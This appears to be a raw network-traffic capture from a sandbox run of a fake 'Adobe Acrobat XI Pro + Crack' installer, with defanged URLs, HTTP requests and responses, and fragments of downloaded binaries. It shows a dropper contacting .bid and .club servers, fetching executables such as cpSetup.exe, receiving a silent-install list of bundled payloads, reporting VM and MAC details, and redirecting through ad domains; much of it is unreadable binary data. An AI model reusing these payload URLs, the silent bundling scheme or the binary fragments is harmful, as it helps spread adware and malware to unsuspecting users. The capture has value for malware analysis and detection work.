u@:.5W.......NFG.g.i<.Y.F..P`1%..R...Ib..>.....s..g1{.L.B..#..}aD0.`.C*..............'../a9.....H}...d...#."...4.z.@c1....5n..@.r...6.7..&...Z..X.06...Ma]..b*....6.....Ql..|.....]..x<..E..D0f'.B.._.....'.h...A.3...w...7...@o|.../J.[.s......e......../.".RB.mB.....k>&l@.r....,...4.lg.....:eQ.......Z...<#...(t....8..PaL,n.r'....n.p8...`:.*.C.(......H2....V.f......S......9..jK;..'".zJ..zY.=

<<< skipped >>>

POST hXXp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695

HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Sun, 27 Nov 2016 15:38:15 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 93c5c2940efa6748481c787e7c245f82.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..

GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.wintervenepest.bid

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-Length: 0..

GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: off.ncongruousric.bid

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 67426

Connection: keep-alive

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="583afdd9a9098.exe"

X-Powered-By: ASP.NET

Date: Sun, 27 Nov 2016 15:38:02 GMT

X-Cache: Miss from cloudfront

Via: 1.1 e4a44efc4b3241dc23019df63a1f645c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: mqZv_Hk7WsVo5gRdzQsl8YqdXLbfXdm6CwSxY3B06yeKlYsWx7oY_w==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...|...B...:............@.......................................@.................................p................................`.......................................................................................text....s.......t.................. ..`.rdata... .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

POST hXXp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: ee.wintervenepest.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:22 GMT

Connection: close

Content-Length: 76128

_..BL.[7.B.....~..>.k...F.)0.B.$}6..@$0N).Z.U}y.d..B...)5....k...f\.~....8....EK.).8........X c..j. ....b....V......7ZX'o...b.~9.x .?...G...X...c.?.....G.z.EZ.^M..OI..,..19.AL.y3..-......D.......W....Ku.Y.}.2..N.6....-.J...Tq...G.-.9.c..5..F.s..;b].F..f.Pj....;ox.....wdB....j.u..4] 5[y.i..L..\m..Y. .!.!lvgT..equ....>.%..|.M..........Z..b.q.|.I9.3..m..O....."AFI........PI..fA..y..'&.S<:..5D.Rj.8;gN....#.......u....O.u..zq...h..C..?I..........#..cL....E8...v.d:....S..}-.@.g....T..C.KQg... .0....N.3....8...v..P;..d.F4.R.....M.x.(.]....e...T}F7].Ii..6.-..@.C..~;..:E7$<.................w...NT6.;..n.5..E\.R.....x......>Z.......!..(-3..o.K...b^].Y.za^'.b.....[..y......0..Y..shC..^$....U....N.....z.t.F.[....YN..i........>.EJ.!.a.R.e.........?.....i.I....1=.7XJ...F).pV_.J.N.P%R.;...}...&...M.... .l.=).d....V.5W.P.mP...5i...}.k.....i.....B...TJ.....D.P..}....Y!......._y.]..;..B..........a.m..bt.{3W".a.e.y...P...........3..f.q....w\.....N..H...B.......@Nv.G......%E....Wv......1y.....v.XkF.A..{n#.....l.@f4..=...lP...yv. ...(..V..V.G..g;DKs.e..]..]....c......?...L...K.1v..B..b.v.....*o.F....c.L...Srb.g~...\.._.........\....&.......?;.....*5..t.~g..>...3~su.....usK.p...M.6.4..?....XYr)W..Ak.Nq......E...6..,....].. ...>.XW9 ...!........0.2.....f...=%'c.@...2...f....k.f....Y...z..t.'\............Z{k..n.:.A......r....[..k.E..,.;..~.........?H......3.{....'..$U/q..-.....;9p_m~b...y..g...tV`x....k..b.!.../..j..m.....e..}.....!x..K.S>7.%.sI&&>......7Fe.Nh.u.2...`.HJd..Ga:.Og. &...Y.j.xh.......hv..4...

<<< skipped >>>

GET /normal_bg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 26781

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT

ETag: "b5b0ebe137c0293f816eaac3de2b4e51"

Accept-Ranges: bytes

Server: AmazonS3

Age: 74433

X-Cache: Hit from cloudfront

Via: 1.1 14484a063800eaed878a3068abf4dfac.cloudfront.net (CloudFront)

X-Amz-Cf-Id: RczU8nabXC7YY05ZRPnbSYN4ruZ16XLLgkDlYC3eb6xeh2YUccPUaQ==

......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................E....................................................................................!.1AQa...q.....2R..u.7...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..BR.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ....J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...

<<< skipped >>>

GET /9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: aclick.adhoc2.net

Connection: Keep-Alive

HTTP/1.1 302 Found

Date: Sun, 27 Nov 2016 15:38:41 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly

Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999

Server: cloudflare-nginx

CF-RAY: 3086ab26d67b4014-SOF

b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..HTTP/1.1 302 Found..Date: Sun, 27 Nov 2016 15:38:41 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly..Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999..Server: cloudflare-nginx..CF-RAY: 3086ab26d67b4014-SOF..b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..

GET /get.php?ses=482796663418412224 HTTP/1.0

Host: away.yosauruslega.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 753152

Connection: close

Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0

Pragma: no-cache

Expires: Sun, 01 Jan 2014 00:00:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Access-Control-Allow-Origin: *

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Sun, 27 Nov 2016 15:37:18 GMT

X-Cache: Miss from cloudfront

Via: 1.1 23d92aa442d5ae9ed0313643d8764687.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Tb6ZJ-_nkdTtqyG7ZIBb1o9GqM223LHzFjNSNfbX87GUeAUw5AtP-Q==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I..H(..H(..H(....N.D(....L..(....M.U(..sv..^(..sv..s(..sv..j(....t.M(..H(..((...v..Y(...v@.I(..H((.I(...v..I(..RichH(..........................PE..L.....:X.................F...N......pF.......`....@.......................................@.....................................P...............................8;..P9..8....................9.......9..@............`..<............................text....D.......F.................. ..`.rdata.......`...0...J..............@....data... ............z..............@....gfids...............z..............@..@.rsrc................~..............@..@.reloc...@.......B...<..............@...........................................................................................................................................................................................................................................................................U..Qj .3/......E..E....J...]....U..j....J......]................U..j....J......]...................J..fP..h0TF...3..Y...........h..G....J...O..h@TF...3..Y......j......hPTF....0G....J..y3.........J....J.....J......hzTF..V3..Y.h.TF..J3..Y.h.TF..>3..Y.j.j.h..J....J..R...h.TF...3..Y.VWj......Y...J..........j.V......J.dnF..4...h.TF...2..Y_^....J.........J..w...h.TF...2..Y.h.TF...2..Y....J..U...h.TF...2..Y.............U........E..T..8G....E..E...]...U...E.P......E.....$........]...U..Q.M..E....aF.3..U...

<<< skipped >>>

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1

Cache-Control: max-age = 564348

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com

HTTP/1.1 200 OK

Server: nginx/1.10.1

Content-Type: application/ocsp-response

Content-Length: 1362

content-transfer-encoding: binary

Cache-Control: max-age=563498, public, no-transform, must-revalidate

Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT

Expires: Sun, 4 Dec 2016 04:06:13 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Connection: keep-alive

0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..20161127040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U....... ...:.....20161127040613Z....20161204040613Z0...*.H.............n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'......~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d........:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'GeoTrust Global CA TGV OCSP Responder 40.."0...*.H.............0.........[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo.............v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U...........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H...............aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U......w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....

<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= HTTP/1.0

Host: get.enomenalco.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 871

Connection: close

Date: Sun, 27 Nov 2016 15:38:05 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 3df8c233328fbbb4fd91eb496d73f2d8.cloudfront.net (CloudFront)

X-Amz-Cf-Id: e8d2sKG-Rk6x8CGWhvDe4g0XzMRR9SWs9pQwMPHTkmgpIXg8EyIF4Q==

files=4.t1=dl.u1=hXXp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat%20XI Pro 11.0.18 M.n2=sevensetup.exe.b2=rx.c2=sevenzip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png.n3=Setup__2140_il2.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle=to run your file.itype=silent...

GET /taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: gurusetman.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Date: Sun, 27 Nov 2016 15:38:27 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly

X-Powered-By: PHP/5.4.37

Pragma: no-cache

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Cache-Control: post-check=0, pre-check=0

Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3

Access-Control-Allow-Credentials: true

Access-Control-Allow-Headers: *

Access-Control-Request-Headers: *

Server: cloudflare-nginx

CF-RAY: 3086aacc60c92950-OTP

0..HTTP/1.1 301 Moved Permanently..Date: Sun, 27 Nov 2016 15:38:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Control: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: post-check=0, pre-check=0..Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3..Access-Control-Allow-Credentials: true..Access-Control-Allow-Headers: *..Access-Control-Request-Headers: *..Server: cloudflare-nginx..CF-RAY: 3086aacc60c92950-OTP..0..

<<< skipped >>>

GET /css/twin.css HTTP/1.1

Accept: text/css

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/css

Date: Sun, 27 Nov 2016 15:38:42 GMT

ETag: W/"58372388-3b06f"

Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

transfer-encoding: chunked

Connection: keep-alive

5eef..............gs.J.(....v:&^......x... @....7xC8......M..D.......F.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u......../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?........y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X......<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G...Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~...~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v.......:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E.......$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!..o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c........b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2............5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my....{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<

<<< skipped >>>

GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: tobacted.info

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Date: Sun, 27 Nov 2016 15:38:27 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly

X-Powered-By: PHP/5.4.16

Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye

Server: cloudflare-nginx

CF-RAY: 3086aad035062914-OTP

0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 27 Nov 2016 15:38:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye..Server: cloudflare-nginx..CF-RAY: 3086aad035062914-OTP..0..

<<< skipped >>>

GET /launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: get.ercationiv.club

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 165

Connection: keep-alive

Date: Sun, 27 Nov 2016 15:38:03 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)

X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==

